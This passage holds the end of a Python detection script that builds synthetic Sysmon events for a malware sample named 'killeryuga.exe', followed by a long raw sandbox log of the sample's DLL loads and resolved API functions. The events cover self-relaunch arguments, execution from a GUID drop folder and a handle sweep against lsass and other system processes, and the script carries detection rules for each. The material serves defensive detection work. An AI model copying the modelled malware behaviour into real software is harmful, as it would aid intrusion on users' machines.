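SELF = USER + r"\Desktop\killeryuga.exe"
DROP = USER + r"\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d"
EXPLORER = r"C:\Windows\explorer.exe"


def create(t, image, cmdline, parent_image, parent_cmdline):
    return {"EventID": 1, "UtcTime": t, "Image": image, "CommandLine": cmdline,
            "ParentImage": parent_image, "ParentCommandLine": parent_cmdline}


def access(t, source, target, granted):
    return {"EventID": 10, "UtcTime": t, "SourceImage": source, "TargetImage": target,
            "GrantedAccess": granted}


SYSTEM_TARGETS = ["smss", "csrss", "wininit", "winlogon", "services", "lsass",
                  "lsm", "svchost", "dwm", "spoolsv", "taskhost", "taskeng"]

EVENTS = [
    create("2019-03-25 03:38:05.000000", SELF, f'"{SELF}"', EXPLORER, "explorer.exe"),
    create("2019-03-25 03:38:06.000000", SELF, f'"{SELF}" --Admin IsNotAutoStart IsNotTask', SELF, f'"{SELF}"'),
    create("2019-03-25 03:38:07.000000", SELF, f'"{SELF}" --ForNetRes TOKEN1 TOKEN2 IsNotAutoStart IsNotTask',
           SELF, f'"{SELF}" --Admin IsNotAutoStart IsNotTask'),
    create("2019-03-25 03:38:07.500000", SELF, f'"{SELF}" --Service 2460 TOKEN1 TOKEN2',
           SELF, f'"{SELF}" --Admin IsNotAutoStart IsNotTask'),
    create("2019-03-25 03:38:08.000000", DROP + r"\updatewin1.exe", '"' + DROP + r'\updatewin1.exe"',
           SELF, f'"{SELF}" --Admin IsNotAutoStart IsNotTask'),
    create("2019-03-25 03:38:09.000000", r"C:\Windows\System32\notepad.exe", "notepad.exe", EXPLORER, "explorer.exe"),
    # benign control: a single open without VM_READ (PROCESS_QUERY_LIMITED_INFORMATION) is not a sweep
    access("2019-03-25 03:38:09.100000", EXPLORER, r"C:\Windows\System32\notepad.exe", "0x1000"),
] + [
    access(f"2019-03-25 03:38:10.{i * 1000:06d}", SELF, "C:\\Windows\\System32\\" + name + ".exe", "0x410")
    for i, name in enumerate(SYSTEM_TARGETS)
]

if __name__ == "__main__":
    for e in detect_self_relaunch(EVENTS):
        print("self-relaunch:", e["CommandLine"])
    for e in detect_guid_dir_exec(EVENTS):
        print("exec from GUID drop dir:", e["Image"])
    for source, n in detect_handle_sweep(EVENTS):
        print(f"handle sweep: {source} opened {n} distinct processes with 0x{SWEEP_MASK:x}")
```

The sweep rule keys on the granted mask rather than on success, because the telemetry only sees handles that were actually granted; the report's failed opens against smss, csrss, lsass and the other protected processes would not appear there, which is why the threshold is a count of distinct targets rather than a ratio.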
Module (561)
Operation Module Additional Information Success Count
Load KERNEL32.DLL base_address = 0x76c20000 True 1
Load ADVAPI32.dll base_address = 0x74d40000 True 2
Load GDI32.dll base_address = 0x75ad0000 True 1
Load ole32.dll base_address = 0x755e0000 True 2
Load SHELL32.dll base_address = 0x75fd0000 True 2
Load USER32.dll base_address = 0x74f40000 True 2
Load kernel32.dll base_address = 0x76c20000 True 2
Load RPCRT4.dll base_address = 0x75ee0000 True 1
Load MPR.dll base_address = 0x74b30000 True 1
Load WININET.dll base_address = 0x753d0000 True 1
Load WINMM.dll base_address = 0x74af0000 True 1
Load SHLWAPI.dll base_address = 0x75340000 True 1
Load KERNEL32.dll base_address = 0x76c20000 True 1
Load OLEAUT32.dll base_address = 0x75220000 True 1
Load IPHLPAPI.DLL base_address = 0x74b50000 True 1
Load WS2_32.dll base_address = 0x75bc0000 True 1
Load DNSAPI.dll base_address = 0x74a80000 True 1
Load CRYPT32.dll base_address = 0x759b0000 True 1
Load msvcr100.dll base_address = 0x749c0000 True 1
Load Psapi.dll base_address = 0x75140000 True 1
Load Shell32.dll base_address = 0x75fd0000 True 48
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 15
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 2
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 1024 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x76c33c5a True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 2
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 2
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x76c5a959 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x76c58266 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x76cb45ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x76cb7198 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x76cb75fe True 1
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x76cbd232 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 2
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 2
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x76c5d594 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x76c3418b True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x76c5bc39 True 1
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 2
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x76c312fc True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 2
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 2
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x76c31462 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 2
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 2
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 3
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 2
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 3
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x76c3cb29 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 2
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x76c31400 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x76c34a2d True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x76c335b7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 3
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 2
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x74d4cc89 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x75af1ace True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x75b14124 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x75b1232e True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x75b1555d True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x75af138a True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x75ae7590 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x75b1439f True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x7560503c True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x755feba1 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x755e6143 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x74f56c3c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x74f6011a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x74f7ed56 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77194100 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x74f63e75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x75f23fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75f5d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x75f21ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x75f01635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x75eff48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x74b33058 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x74b32f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x74b32dd6 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74af26e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x76c5828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x74f57136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
